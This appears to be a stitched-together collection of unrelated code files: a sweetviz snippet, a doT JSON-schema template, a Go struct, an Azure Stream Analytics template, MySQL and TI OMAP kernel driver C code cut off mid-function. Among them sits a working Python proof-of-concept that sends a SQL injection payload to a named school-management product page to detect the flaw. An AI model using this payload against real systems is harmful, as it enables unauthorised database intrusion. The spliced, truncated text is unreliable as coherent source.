feature_dict["html_summary"] = sv_html.generate_html_summary_cat(feature_dict, compare_dict) return
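For context, do_detail_categorical() and analyze() above are internal helpers; the public sweetviz entry point that eventually drives them is compact. A usage sketch (the CSV path and output file name are placeholders):

import pandas as pd
import sweetviz as sv

df = pd.read_csv("train.csv")      # placeholder dataset
report = sv.analyze(df)            # dispatches to per-feature analyzers like analyze() above
report.show_html("report.html")    # writes the rendered HTML report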
{{# def.definitions }} {{# def.errors }} {{# def.setupKeyword }} {{# def.setupNextLevel }} var {{=$errs}} = errors; var prevValid{{=$lvl}} = false; var {{=$valid}} = false; {{ var $currentBaseId = $it.baseId; }} {{# def.setCompositeRule }} {{~ $schema:$sch:$i }} {{? {{# def.nonEmptySchema:$sch }} }} {{ $it.schema = $sch; $it.schemaPath = $schemaPath + '[' + $i + ']'; $it.errSchemaPath = $errSchemaPath + '/' + $i; }} {{# def.insertSubschemaCode }} {{??}} var {{=$nextValid}} = true; {{?}} {{? $i }} if ({{=$nextValid}} && prevValid{{=$lvl}}) {{=$valid}} = false; else { {{ $closingBraces += '}'; }} {{?}} if ({{=$nextValid}}) {{=$valid}} = prevValid{{=$lvl}} = true; {{~}} {{# def.resetCompositeRule }} {{= $closingBraces }} if (!{{=$valid}}) { {{# def.extraError:'oneOf' }} } else { {{# def.resetErrors }} {{? it.opts.allErrors }} } {{?}}
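The template above compiles JSON Schema's oneOf: prevValid{lvl} remembers whether an earlier subschema already matched, and a second match fails the keyword. The same short-circuit logic, sketched in Python for readers who don't speak doT (names are illustrative):

def one_of(validators, value):
    # Mirrors the template: prev_valid remembers an earlier match,
    # and a second match makes the whole keyword fail immediately.
    prev_valid = False
    for validate in validators:
        if validate(value):
            if prev_valid:
                return False      # more than one subschema matched
            prev_valid = True
    return prev_valid             # True iff exactly one matched

# e.g. one_of([lambda v: isinstance(v, int), lambda v: v > 0], 5) -> False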
package node type Node struct { Id int } type NodeOrderedSet []Node
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Anmai grghjl.aspx SQL injection via the stuNo parameter
referer: http://www.wooyun.org/bugs/wooyun-2010-0102420
author: Lucifer
description: The stuNo parameter of /anmai/Edis/DiathesisAppraise/grghjl.aspx is vulnerable to SQL injection.
'''
import sys
import requests

class anmai_grghjl_stuNo_sqli_BaseVerify:
    def __init__(self, url):
        self.url = url

    def run(self):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon)>0--"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in req.text:
                return "[+]Anmai grghjl.aspx stuNo SQL injection found...(high risk)\tpayload: "+vulnurl
        except:
            return "[-]connect timeout"

if __name__ == "__main__":
    testVuln = anmai_grghjl_stuNo_sqli_BaseVerify(sys.argv[1])
    print(testVuln.run())
{ "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "streamingJobName": { "type": "string", "defaultValue": "streamingjob" }, "eventHubNamespace": { "type": "string" }, "eventHubKey": { "type": "securestring" }, "eventHubName": { "type": "string" }, "eventHubConsumerGroupName": { "type": "string" }, "streamingUnits": { "type": "int", "defaultValue": 3 }, "cosmosdbAccountId": { "type": "string" }, "cosmosdbAccountKey": { "type": "securestring" }, "cosmosdbDatabase": { "type": "string", "defaultValue": "streaming" }, "cosmosdbCollectionName": { "type": "string", "defaultValue": "rawdata" }, "cosmosdbPartitionKey": { "type": "string", "defaultValue": "deviceId" }, "cosmosdbDocumentId": { "type": "string", "defaultValue": "eventId" } }, "resources": [ { "apiVersion": "2017-04-01-preview", "name": "[parameters('streamingJobName')]", "location": "[resourceGroup().location]", "type": "Microsoft.StreamAnalytics/StreamingJobs", "identity": { "type": "systemAssigned" }, "properties": { "sku": { "name": "standard" }, "eventsOutOfOrderPolicy": "drop", "eventsOutOfOrderMaxDelayInSeconds": 10, "compatibilityLevel": "1.2", "outputStartMode": "JobStartTime", "inputs": [ { "name": "inputEventHub", "properties": { "type": "stream", "serialization": { "type": "JSON", "properties": { "encoding": "UTF8" } }, "datasource": { "type": "Microsoft.ServiceBus/EventHub", "properties": { "serviceBusNamespace": "[parameters('eventHubNamespace')]", "sharedAccessPolicyName": "Listen", "sharedAccessPolicyKey": "[parameters('eventHubKey')]", "eventHubName": "[parameters('eventHubName')]", "consumerGroupName": "[parameters('eventHubConsumerGroupName')]" } } } } ], "transformation": { "name": "ProcessSampleData", "properties": { "streamingUnits": "[int(parameters('streamingUnits'))]", "query": "select deviceId, deviceSequenceNumber, type, complexData, value, eventId, PartitionId, createdAt, EventEnqueuedUtcTime AS enqueuedAt, EventProcessedUtcTime AS processedAt, UDF.GetCurrentDateTime('') AS processedAt2 from inputEventHub partition by PartitionId" } }, "functions": [{ "name": "GetCurrentDateTime", "type": "Microsoft.StreamAnalytics/streamingjobs/functions", "properties": { "type": "Scalar", "properties": { "inputs": [{ "dataType": "any", "isConfigurationParameter": null }], "output": { "dataType": "any" }, "binding": { "type": "Microsoft.StreamAnalytics/JavascriptUdf", "properties": { "script": "// Sample UDF which returns current timestamp.\nfunction main(s) {\n return new Date().toISOString();\n}" } } }, "etag": "cc766b0b-3746-4c3b-bb8e-d9366a6c352f" } }], "outputs": [ { "name": "output", "properties": { "serialization": { "type": "JSON", "properties": { "encoding": "UTF8" } }, "datasource": { "type": "Microsoft.Storage/DocumentDB", "properties": { "accountId": "[parameters('cosmosdbAccountId')]", "accountKey": "[parameters('cosmosdbAccountKey')]", "database": "[parameters('cosmosdbDatabase')]", "collectionNamePattern": "[parameters('cosmosdbCollectionName')]", "partitionKey": "[parameters('cosmosdbPartitionKey')]", "documentId": "[parameters('cosmosdbDocumentId')]" } } } } ] } } ] }
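Before deploying, it can be useful to sanity-check the template and read back the embedded Stream Analytics query. A small sketch, assuming the template has been saved as streamingjob.json (hypothetical file name):

import json

with open("streamingjob.json") as f:       # hypothetical file name
    template = json.load(f)

job = template["resources"][0]
print(job["type"])   # Microsoft.StreamAnalytics/StreamingJobs
print(job["properties"]["transformation"]["properties"]["query"])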
<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup> <ClInclude Include="..\..\final_tiletrace.hpp" /> <ClInclude Include="..\..\final_platform_layer.h" /> </ItemGroup> <ItemGroup> <ClCompile Include="ftt_tiletracingdemo.cpp" /> </ItemGroup> </Project>
/* * Copyright (c) 2018, 2019, Oracle and/or its affiliates. All rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License, version 2.0, * as published by the Free Software Foundation. * * This program is also distributed with certain software (including * but not limited to OpenSSL) that is licensed under separate terms, * as designated in a particular file or component or in included license * documentation. The authors of MySQL hereby grant you an additional * permission to link the program and your derivative works with the * separately licensed software that they have included with MySQL. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License, version 2.0, for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include "plugin/x/src/helper/multithread/cond.h" #include "my_systime.h" namespace xpl { Cond::Cond(PSI_cond_key key) { mysql_cond_init(key, &m_cond); } Cond::~Cond() { mysql_cond_destroy(&m_cond); } void Cond::wait(Mutex &mutex) { mysql_cond_wait(&m_cond, &mutex.m_mutex); } int Cond::timed_wait(Mutex &mutex, unsigned long long nanoseconds) { timespec ts; set_timespec_nsec(&ts, nanoseconds); return mysql_cond_timedwait(&m_cond, &mutex.m_mutex, &ts); } void Cond::signal() { mysql_cond_signal(&m_cond); } void Cond::signal(Mutex &mutex) { MUTEX_LOCK(lock, mutex); signal(); } void Cond::broadcast() { mysql_cond_broadcast(&m_cond); } void Cond::broadcast(Mutex &mutex) { MUTEX_LOCK(lock, mutex); broadcast(); } } // namespace xpl
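The class above is a thin shim over mysql_cond_*; the usage pattern it supports (wait while holding the paired mutex, optionally with a relative nanosecond timeout) maps directly onto Python's threading.Condition. Shown only as an analogy, not MySQL code:

import threading

cond = threading.Condition()          # owns its mutex, like Cond paired with Mutex here

def timed_wait(nanoseconds):
    with cond:                        # equivalent of locking the Mutex first
        # threading takes seconds; the C++ API takes a relative ns delta
        return cond.wait(timeout=nanoseconds / 1e9)   # False means timed out

def signal():
    with cond:                        # Cond::signal(Mutex&) also locks first
        cond.notify()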
/*
 * chnl_sm.c
 *
 * DSP-BIOS Bridge driver support functions for TI OMAP processors.
 *
 * Implements upper edge functions for Bridge driver channel module.
 *
 * Copyright (C) 2005-2006 Texas Instruments, Inc.
 *
 * This package is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 *
 * THIS PACKAGE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
 * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
 */

/*
 * The lower edge functions must be implemented by the Bridge driver
 * writer, and are declared in chnl_sm.h.
 *
 * Care is taken in this code to prevent simultaneous access to channel
 * queues from
 * 1. Threads.
 * 2. io_dpc(), scheduled from the io_isr() as an event.
 *
 * This is done primarily by:
 * - Semaphores.
 * - state flags in the channel object; and
 * - ensuring the IO_Dispatch() routine, which is called from both
 *   CHNL_AddIOReq() and the DPC(if implemented), is not re-entered.
 *
 * Channel Invariant:
 * There is an important invariant condition which must be maintained per
 * channel outside of bridge_chnl_get_ioc() and IO_Dispatch(), violation of
 * which may cause timeouts and/or failure of function sync_wait_on_event.
 * This invariant condition is:
 *
 * LST_Empty(pchnl->pio_completions) ==> pchnl->sync_event is reset
 * and
 * !LST_Empty(pchnl->pio_completions) ==> pchnl->sync_event is set.
 */

#include <linux/types.h>

/* ----------------------------------- OS */
#include <dspbridge/host_os.h>

/* ----------------------------------- DSP/BIOS Bridge */
#include <dspbridge/dbdefs.h>

/* ----------------------------------- Trace & Debug */
#include <dspbridge/dbc.h>

/* ----------------------------------- OS Adaptation Layer */
#include <dspbridge/cfg.h>
#include <dspbridge/sync.h>

/* ----------------------------------- Bridge Driver */
#include <dspbridge/dspdefs.h>
#include <dspbridge/dspchnl.h>
#include "_tiomap.h"

/* ----------------------------------- Platform Manager */
#include <dspbridge/dev.h>

/* ----------------------------------- Others */
#include <dspbridge/io_sm.h>

/* ----------------------------------- Define for This */
#define USERMODE_ADDR   PAGE_OFFSET

#define MAILBOX_IRQ INT_MAIL_MPU_IRQ

/* ----------------------------------- Function Prototypes */
static struct lst_list *create_chirp_list(u32 chirps);

static void free_chirp_list(struct lst_list *chirp_list);

static struct chnl_irp *make_new_chirp(void);

static int search_free_channel(struct chnl_mgr *chnl_mgr_obj,
			       u32 *chnl);

/*
 *  ======== bridge_chnl_add_io_req ========
 *      Enqueue an I/O request for data transfer on a channel to the DSP.
 *      The direction (mode) is specified in the channel object. Note the DSP
 *      address is specified for channels opened in direct I/O mode.
*/ int bridge_chnl_add_io_req(struct chnl_object *chnl_obj, void *host_buf, u32 byte_size, u32 buf_size, u32 dw_dsp_addr, u32 dw_arg) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; struct chnl_irp *chnl_packet_obj = NULL; struct bridge_dev_context *dev_ctxt; struct dev_object *dev_obj; u8 dw_state; bool is_eos; struct chnl_mgr *chnl_mgr_obj = pchnl->chnl_mgr_obj; u8 *host_sys_buf = NULL; bool sched_dpc = false; u16 mb_val = 0; is_eos = (byte_size == 0); /* Validate args */ if (!host_buf || !pchnl) { status = -EFAULT; } else if (is_eos && CHNL_IS_INPUT(pchnl->chnl_mode)) { status = -EPERM; } else { /* * Check the channel state: only queue chirp if channel state * allows it. */ dw_state = pchnl->dw_state; if (dw_state != CHNL_STATEREADY) { if (dw_state & CHNL_STATECANCEL) status = -ECANCELED; else if ((dw_state & CHNL_STATEEOS) && CHNL_IS_OUTPUT(pchnl->chnl_mode)) status = -EPIPE; else /* No other possible states left */ DBC_ASSERT(0); } } dev_obj = dev_get_first(); dev_get_bridge_context(dev_obj, &dev_ctxt); if (!dev_ctxt) status = -EFAULT; if (status) goto func_end; if (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1 && host_buf) { if (!(host_buf < (void *)USERMODE_ADDR)) { host_sys_buf = host_buf; goto func_cont; } /* if addr in user mode, then copy to kernel space */ host_sys_buf = kmalloc(buf_size, GFP_KERNEL); if (host_sys_buf == NULL) { status = -ENOMEM; goto func_end; } if (CHNL_IS_OUTPUT(pchnl->chnl_mode)) { status = copy_from_user(host_sys_buf, host_buf, buf_size); if (status) { kfree(host_sys_buf); host_sys_buf = NULL; status = -EFAULT; goto func_end; } } } func_cont: /* Mailbox IRQ is disabled to avoid race condition with DMA/ZCPY * channels. DPCCS is held to avoid race conditions with PCPY channels. * If DPC is scheduled in process context (iosm_schedule) and any * non-mailbox interrupt occurs, that DPC will run and break CS. Hence * we disable ALL DPCs. We will try to disable ONLY IO DPC later. */ spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock); omap_mbox_disable_irq(dev_ctxt->mbox, IRQ_RX); if (pchnl->chnl_type == CHNL_PCPY) { /* This is a processor-copy channel. */ if (!status && CHNL_IS_OUTPUT(pchnl->chnl_mode)) { /* Check buffer size on output channels for fit. */ if (byte_size > io_buf_size(pchnl->chnl_mgr_obj->hio_mgr)) status = -EINVAL; } } if (!status) { /* Get a free chirp: */ chnl_packet_obj = (struct chnl_irp *)lst_get_head(pchnl->free_packets_list); if (chnl_packet_obj == NULL) status = -EIO; } if (!status) { /* Enqueue the chirp on the chnl's IORequest queue: */ chnl_packet_obj->host_user_buf = chnl_packet_obj->host_sys_buf = host_buf; if (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1) chnl_packet_obj->host_sys_buf = host_sys_buf; /* * Note: for dma chans dw_dsp_addr contains dsp address * of SM buffer. */ DBC_ASSERT(chnl_mgr_obj->word_size != 0); /* DSP address */ chnl_packet_obj->dsp_tx_addr = dw_dsp_addr / chnl_mgr_obj->word_size; chnl_packet_obj->byte_size = byte_size; chnl_packet_obj->buf_size = buf_size; /* Only valid for output channel */ chnl_packet_obj->dw_arg = dw_arg; chnl_packet_obj->status = (is_eos ? CHNL_IOCSTATEOS : CHNL_IOCSTATCOMPLETE); lst_put_tail(pchnl->pio_requests, (struct list_head *)chnl_packet_obj); pchnl->cio_reqs++; DBC_ASSERT(pchnl->cio_reqs <= pchnl->chnl_packets); /* * If end of stream, update the channel state to prevent * more IOR's. 
		 */
		if (is_eos)
			pchnl->dw_state |= CHNL_STATEEOS;

		/* Legacy DSM Processor-Copy */
		DBC_ASSERT(pchnl->chnl_type == CHNL_PCPY);
		/* Request IO from the DSP */
		io_request_chnl(chnl_mgr_obj->hio_mgr, pchnl,
				(CHNL_IS_INPUT(pchnl->chnl_mode) ? IO_INPUT :
				 IO_OUTPUT), &mb_val);
		sched_dpc = true;
	}
	omap_mbox_enable_irq(dev_ctxt->mbox, IRQ_RX);
	spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock);
	if (mb_val != 0)
		sm_interrupt_dsp(dev_ctxt, mb_val);

	/* Schedule a DPC, to do the actual data transfer */
	if (sched_dpc)
		iosm_schedule(chnl_mgr_obj->hio_mgr);

func_end:
	return status;
}

/*
 *  ======== bridge_chnl_cancel_io ========
 *      Return all I/O requests to the client which have not yet been
 *      transferred.  The channel's I/O completion object is
 *      signalled, and all the I/O requests are queued as IOC's, with the
 *      status field set to CHNL_IOCSTATCANCEL.
 *      This call is typically used in abort situations, and is a prelude to
 *      chnl_close();
 */
int bridge_chnl_cancel_io(struct chnl_object *chnl_obj)
{
	int status = 0;
	struct chnl_object *pchnl = (struct chnl_object *)chnl_obj;
	u32 chnl_id = -1;
	s8 chnl_mode;
	struct chnl_irp *chnl_packet_obj;
	struct chnl_mgr *chnl_mgr_obj = NULL;

	/* Check args: */
	if (pchnl && pchnl->chnl_mgr_obj) {
		chnl_id = pchnl->chnl_id;
		chnl_mode = pchnl->chnl_mode;
		chnl_mgr_obj = pchnl->chnl_mgr_obj;
	} else {
		status = -EFAULT;
	}
	if (status)
		goto func_end;

	/*  Mark this channel as cancelled, to prevent further IORequests or
	 *  dispatching. */
	spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock);
	pchnl->dw_state |= CHNL_STATECANCEL;
	if (LST_IS_EMPTY(pchnl->pio_requests))
		goto func_cont;

	if (pchnl->chnl_type == CHNL_PCPY) {
		/* Indicate we have no more buffers available for transfer: */
		if (CHNL_IS_INPUT(pchnl->chnl_mode)) {
			io_cancel_chnl(chnl_mgr_obj->hio_mgr, chnl_id);
		} else {
			/* Record that we no longer have output buffers
			 * available: */
			chnl_mgr_obj->dw_output_mask &= ~(1 << chnl_id);
		}
	}
	/* Move all IOR's to IOC queue: */
	while (!LST_IS_EMPTY(pchnl->pio_requests)) {
		chnl_packet_obj =
		    (struct chnl_irp *)lst_get_head(pchnl->pio_requests);
		if (chnl_packet_obj) {
			chnl_packet_obj->byte_size = 0;
			chnl_packet_obj->status |= CHNL_IOCSTATCANCEL;
			lst_put_tail(pchnl->pio_completions,
				     (struct list_head *)chnl_packet_obj);
			pchnl->cio_cs++;
			pchnl->cio_reqs--;
			DBC_ASSERT(pchnl->cio_reqs >= 0);
		}
	}
func_cont:
	spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock);
func_end:
	return status;
}

/*
 *  ======== bridge_chnl_close ========
 *  Purpose:
 *      Ensures all pending I/O on this channel is cancelled, discards all
 *      queued I/O completion notifications, then frees the resources allocated
 *      for this channel, and makes the corresponding logical channel id
 *      available for subsequent use.
 */
int bridge_chnl_close(struct chnl_object *chnl_obj)
{
	int status;
	struct chnl_object *pchnl = (struct chnl_object *)chnl_obj;

	/* Check args: */
	if (!pchnl) {
		status = -EFAULT;
		goto func_cont;
	}
	{
		/* Cancel IO: this ensures no further IO requests or
		 * notifications. */
		status = bridge_chnl_cancel_io(chnl_obj);
	}
func_cont:
	if (!status) {
		/* Assert I/O on this channel is now cancelled: Protects
		 * from io_dpc. */
		DBC_ASSERT((pchnl->dw_state & CHNL_STATECANCEL));
		/* Invalidate channel object: Protects from
		 * CHNL_GetIOCompletion().
*/ /* Free the slot in the channel manager: */ pchnl->chnl_mgr_obj->ap_channel[pchnl->chnl_id] = NULL; spin_lock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); pchnl->chnl_mgr_obj->open_channels -= 1; spin_unlock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); if (pchnl->ntfy_obj) { ntfy_delete(pchnl->ntfy_obj); kfree(pchnl->ntfy_obj); pchnl->ntfy_obj = NULL; } /* Reset channel event: (NOTE: user_event freed in user * context.). */ if (pchnl->sync_event) { sync_reset_event(pchnl->sync_event); kfree(pchnl->sync_event); pchnl->sync_event = NULL; } /* Free I/O request and I/O completion queues: */ if (pchnl->pio_completions) { free_chirp_list(pchnl->pio_completions); pchnl->pio_completions = NULL; pchnl->cio_cs = 0; } if (pchnl->pio_requests) { free_chirp_list(pchnl->pio_requests); pchnl->pio_requests = NULL; pchnl->cio_reqs = 0; } if (pchnl->free_packets_list) { free_chirp_list(pchnl->free_packets_list); pchnl->free_packets_list = NULL; } /* Release channel object. */ kfree(pchnl); pchnl = NULL; } DBC_ENSURE(status || !pchnl); return status; } /* * ======== bridge_chnl_create ======== * Create a channel manager object, responsible for opening new channels * and closing old ones for a given board. */ int bridge_chnl_create(struct chnl_mgr **channel_mgr, struct dev_object *hdev_obj, const struct chnl_mgrattrs *mgr_attrts) { int status = 0; struct chnl_mgr *chnl_mgr_obj = NULL; u8 max_channels; /* Check DBC requirements: */ DBC_REQUIRE(channel_mgr != NULL); DBC_REQUIRE(mgr_attrts != NULL); DBC_REQUIRE(mgr_attrts->max_channels > 0); DBC_REQUIRE(mgr_attrts->max_channels <= CHNL_MAXCHANNELS); DBC_REQUIRE(mgr_attrts->word_size != 0); /* Allocate channel manager object */ chnl_mgr_obj = kzalloc(sizeof(struct chnl_mgr), GFP_KERNEL); if (chnl_mgr_obj) { /* * The max_channels attr must equal the # of supported chnls for * each transport(# chnls for PCPY = DDMA = ZCPY): i.e. * mgr_attrts->max_channels = CHNL_MAXCHANNELS = * DDMA_MAXDDMACHNLS = DDMA_MAXZCPYCHNLS. */ DBC_ASSERT(mgr_attrts->max_channels == CHNL_MAXCHANNELS); max_channels = CHNL_MAXCHANNELS + CHNL_MAXCHANNELS * CHNL_PCPY; /* Create array of channels */ chnl_mgr_obj->ap_channel = kzalloc(sizeof(struct chnl_object *) * max_channels, GFP_KERNEL); if (chnl_mgr_obj->ap_channel) { /* Initialize chnl_mgr object */ chnl_mgr_obj->dw_type = CHNL_TYPESM; chnl_mgr_obj->word_size = mgr_attrts->word_size; /* Total # chnls supported */ chnl_mgr_obj->max_channels = max_channels; chnl_mgr_obj->open_channels = 0; chnl_mgr_obj->dw_output_mask = 0; chnl_mgr_obj->dw_last_output = 0; chnl_mgr_obj->hdev_obj = hdev_obj; spin_lock_init(&chnl_mgr_obj->chnl_mgr_lock); } else { status = -ENOMEM; } } else { status = -ENOMEM; } if (status) { bridge_chnl_destroy(chnl_mgr_obj); *channel_mgr = NULL; } else { /* Return channel manager object to caller... */ *channel_mgr = chnl_mgr_obj; } return status; } /* * ======== bridge_chnl_destroy ======== * Purpose: * Close all open channels, and destroy the channel manager. */ int bridge_chnl_destroy(struct chnl_mgr *hchnl_mgr) { int status = 0; struct chnl_mgr *chnl_mgr_obj = hchnl_mgr; u32 chnl_id; if (hchnl_mgr) { /* Close all open channels: */ for (chnl_id = 0; chnl_id < chnl_mgr_obj->max_channels; chnl_id++) { status = bridge_chnl_close(chnl_mgr_obj->ap_channel [chnl_id]); if (status) dev_dbg(bridge, "%s: Error status 0x%x\n", __func__, status); } /* Free channel manager object: */ kfree(chnl_mgr_obj->ap_channel); /* Set hchnl_mgr to NULL in device object. 
*/ dev_set_chnl_mgr(chnl_mgr_obj->hdev_obj, NULL); /* Free this Chnl Mgr object: */ kfree(hchnl_mgr); } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_flush_io ======== * purpose: * Flushes all the outstanding data requests on a channel. */ int bridge_chnl_flush_io(struct chnl_object *chnl_obj, u32 timeout) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; s8 chnl_mode = -1; struct chnl_mgr *chnl_mgr_obj; struct chnl_ioc chnl_ioc_obj; /* Check args: */ if (pchnl) { if ((timeout == CHNL_IOCNOWAIT) && CHNL_IS_OUTPUT(pchnl->chnl_mode)) { status = -EINVAL; } else { chnl_mode = pchnl->chnl_mode; chnl_mgr_obj = pchnl->chnl_mgr_obj; } } else { status = -EFAULT; } if (!status) { /* Note: Currently, if another thread continues to add IO * requests to this channel, this function will continue to * flush all such queued IO requests. */ if (CHNL_IS_OUTPUT(chnl_mode) && (pchnl->chnl_type == CHNL_PCPY)) { /* Wait for IO completions, up to the specified * timeout: */ while (!LST_IS_EMPTY(pchnl->pio_requests) && !status) { status = bridge_chnl_get_ioc(chnl_obj, timeout, &chnl_ioc_obj); if (status) continue; if (chnl_ioc_obj.status & CHNL_IOCSTATTIMEOUT) status = -ETIMEDOUT; } } else { status = bridge_chnl_cancel_io(chnl_obj); /* Now, leave the channel in the ready state: */ pchnl->dw_state &= ~CHNL_STATECANCEL; } } DBC_ENSURE(status || LST_IS_EMPTY(pchnl->pio_requests)); return status; } /* * ======== bridge_chnl_get_info ======== * Purpose: * Retrieve information related to a channel. */ int bridge_chnl_get_info(struct chnl_object *chnl_obj, struct chnl_info *channel_info) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; if (channel_info != NULL) { if (pchnl) { /* Return the requested information: */ channel_info->hchnl_mgr = pchnl->chnl_mgr_obj; channel_info->event_obj = pchnl->user_event; channel_info->cnhl_id = pchnl->chnl_id; channel_info->dw_mode = pchnl->chnl_mode; channel_info->bytes_tx = pchnl->bytes_moved; channel_info->process = pchnl->process; channel_info->sync_event = pchnl->sync_event; channel_info->cio_cs = pchnl->cio_cs; channel_info->cio_reqs = pchnl->cio_reqs; channel_info->dw_state = pchnl->dw_state; } else { status = -EFAULT; } } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_get_ioc ======== * Optionally wait for I/O completion on a channel. Dequeue an I/O * completion record, which contains information about the completed * I/O request. * Note: Ensures Channel Invariant (see notes above). 
 */
int bridge_chnl_get_ioc(struct chnl_object *chnl_obj, u32 timeout,
			struct chnl_ioc *chan_ioc)
{
	int status = 0;
	struct chnl_object *pchnl = (struct chnl_object *)chnl_obj;
	struct chnl_irp *chnl_packet_obj;
	int stat_sync;
	bool dequeue_ioc = true;
	struct chnl_ioc ioc = { NULL, 0, 0, 0, 0 };
	u8 *host_sys_buf = NULL;
	struct bridge_dev_context *dev_ctxt;
	struct dev_object *dev_obj;

	/* Check args: */
	if (!chan_ioc || !pchnl) {
		status = -EFAULT;
	} else if (timeout == CHNL_IOCNOWAIT) {
		if (LST_IS_EMPTY(pchnl->pio_completions))
			status = -EREMOTEIO;
	}

	dev_obj = dev_get_first();
	dev_get_bridge_context(dev_obj, &dev_ctxt);
	if (!dev_ctxt)
		status = -EFAULT;

	if (status)
		goto func_end;

	ioc.status = CHNL_IOCSTATCOMPLETE;
	if (timeout != CHNL_IOCNOWAIT && LST_IS_EMPTY(pchnl->pio_completions)) {
		if (timeout == CHNL_IOCINFINITE)
			timeout = SYNC_INFINITE;

		stat_sync = sync_wait_on_event(pchnl->sync_event, timeout);
		if (stat_sync == -ETIME) {
			/* No response from DSP */
			ioc.status |= CHNL_IOCSTATTIMEOUT;
			dequeue_ioc = false;
		} else if (stat_sync == -EPERM) {
			/* This can occur when the user mode thread is
			 * aborted (^C), or when _VWIN32_WaitSingleObject()
			 * fails due to unknown causes. */
			/* Even though Wait failed, there may be something in
			 * the Q: */
			if (LST_IS_EMPTY(pchnl->pio_completions)) {
				ioc.status |= CHNL_IOCSTATCANCEL;
				dequeue_ioc = false;
			}
		}
	}
	/* See comment in AddIOReq */
	spin_lock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock);
	omap_mbox_disable_irq(dev_ctxt->mbox, IRQ_RX);
	if (dequeue_ioc) {
		/* Dequeue IOC and set chan_ioc; */
		DBC_ASSERT(!LST_IS_EMPTY(pchnl->pio_completions));
		chnl_packet_obj =
		    (struct chnl_irp *)lst_get_head(pchnl->pio_completions);
		/* Update chan_ioc from channel state and chirp: */
		if (chnl_packet_obj) {
			pchnl->cio_cs--;
			/*  If this is a zero-copy channel, then set IOC's pbuf
			 *  to the DSP's address. This DSP address will get
			 *  translated to user's virtual addr later. */
			{
				host_sys_buf = chnl_packet_obj->host_sys_buf;
				ioc.pbuf = chnl_packet_obj->host_user_buf;
			}
			ioc.byte_size = chnl_packet_obj->byte_size;
			ioc.buf_size = chnl_packet_obj->buf_size;
			ioc.dw_arg = chnl_packet_obj->dw_arg;
			ioc.status |= chnl_packet_obj->status;
			/* Place the used chirp on the free list: */
			lst_put_tail(pchnl->free_packets_list,
				     (struct list_head *)chnl_packet_obj);
		} else {
			ioc.pbuf = NULL;
			ioc.byte_size = 0;
		}
	} else {
		ioc.pbuf = NULL;
		ioc.byte_size = 0;
		ioc.dw_arg = 0;
		ioc.buf_size = 0;
	}
	/* Ensure invariant: If any IOC's are queued for this channel... */
	if (!LST_IS_EMPTY(pchnl->pio_completions)) {
		/*  Since DSPStream_Reclaim() does not take a timeout
		 *  parameter, we pass the stream's timeout value to
		 *  bridge_chnl_get_ioc. We cannot determine whether or not
		 *  we have waited in User mode. Since the stream's timeout
		 *  value may be non-zero, we still have to set the event.
		 *  Therefore, this optimization is taken out.
		 *
		 *  if (timeout == CHNL_IOCNOWAIT) {
		 *    ... ensure event is set..
		 *    sync_set_event(pchnl->sync_event);
		 *  }
		 */
		sync_set_event(pchnl->sync_event);
	} else {
		/* else, if list is empty, ensure event is reset.
*/ sync_reset_event(pchnl->sync_event); } omap_mbox_enable_irq(dev_ctxt->mbox, IRQ_RX); spin_unlock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); if (dequeue_ioc && (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1)) { if (!(ioc.pbuf < (void *)USERMODE_ADDR)) goto func_cont; /* If the addr is in user mode, then copy it */ if (!host_sys_buf || !ioc.pbuf) { status = -EFAULT; goto func_cont; } if (!CHNL_IS_INPUT(pchnl->chnl_mode)) goto func_cont1; /*host_user_buf */ status = copy_to_user(ioc.pbuf, host_sys_buf, ioc.byte_size); if (status) { if (current->flags & PF_EXITING) status = 0; } if (status) status = -EFAULT; func_cont1: kfree(host_sys_buf); } func_cont: /* Update User's IOC block: */ *chan_ioc = ioc; func_end: return status; } /* * ======== bridge_chnl_get_mgr_info ======== * Retrieve information related to the channel manager. */ int bridge_chnl_get_mgr_info(struct chnl_mgr *hchnl_mgr, u32 ch_id, struct chnl_mgrinfo *mgr_info) { int status = 0; struct chnl_mgr *chnl_mgr_obj = (struct chnl_mgr *)hchnl_mgr; if (mgr_info != NULL) { if (ch_id <= CHNL_MAXCHANNELS) { if (hchnl_mgr) { /* Return the requested information: */ mgr_info->chnl_obj = 